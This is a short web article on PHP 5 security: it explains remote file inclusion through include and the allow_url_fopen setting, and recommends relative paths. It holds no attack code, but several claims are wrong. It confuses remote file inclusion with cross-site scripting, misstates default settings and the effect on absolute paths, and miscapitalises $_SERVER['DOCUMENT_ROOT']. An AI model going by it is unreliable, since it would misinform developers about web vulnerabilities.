Security is a big topic with web developers, who are likely to get a bad reputation as a lazy programmer if clients complain their websites have been hacked by some shape or form. With the release of PHP 5, developers are urged to make the switch to a more secure platform over PHP 4. One example of the better security is with including files into an application.
XSS attacks, or what are called cross-site scripting attacks, are attacks in which a hacker injections code from a remote website. This attack is prevalent on PHP 4 platforms, but not so much on PHP 5 platforms due to a change in how configurations are built on default. PHP 4 allows limitless control of absolute file paths, where PHP 5 has cracked down on the absolute paths and instead warrants other methods of achieving file inclusion.
One popular method of how servers are being exploited with XSS attacks is by using them as a proxy server in which to do illegal activity. If the hacker is careful, he or she won’t be caught and will be able to send out spam mail, or even conduct attacks against other websites and servers. Because the attack seems to come from the webmaster’s server, the hacker could likely never be caught and cause the webmaster personal liability.
The configuration command we are referencing here is “allow_url_fopen.” When functioning as a default installation, PHP 4 will allow this configuration to be on, while PHP 5 will default it as off. It essentially shuts down absolute file paths for PHP 5 users, so there is more emphasis on using relative paths. Don’t fret, relative paths are just as easy to use and more secure.
Another method of using the include function in PHP 5 is to simply call the server’s own base directory for calling files. This way the same syntax can be observed. The server variable for this base directory, “$_Server['document_root'],” takes the place of the webmaster’s domain name when including a file. Using this server variable, in effect, allows webmasters to still use absolute paths in their include functions. This is useful for bypassing changing all include functions to accommodate for relative paths.
It is recommended that the “allow_url_fopen” command be kept off, even though it could be easily changed in the server configuration if access to the server is granted. If for some reason there is no possible way to keep this configuration setting off, there should be more focus on sanitizing any input a user on a website might have into a database or variable. After all, web servers got along fairly fine with the setting defaulted to on in PHP 4.
In Conclusion
PHP 5 has brought us many new security features, and the default setting of disallowing absolute paths in include functions is an example of where the industry is going. For more information on the syntax, how to use it, and more words on web development, readers should consult the PHP manual or obtain a PHP 5 book from a local bookstore for more information.
Learn more about php include error and include url file access is disabled in the server configuration.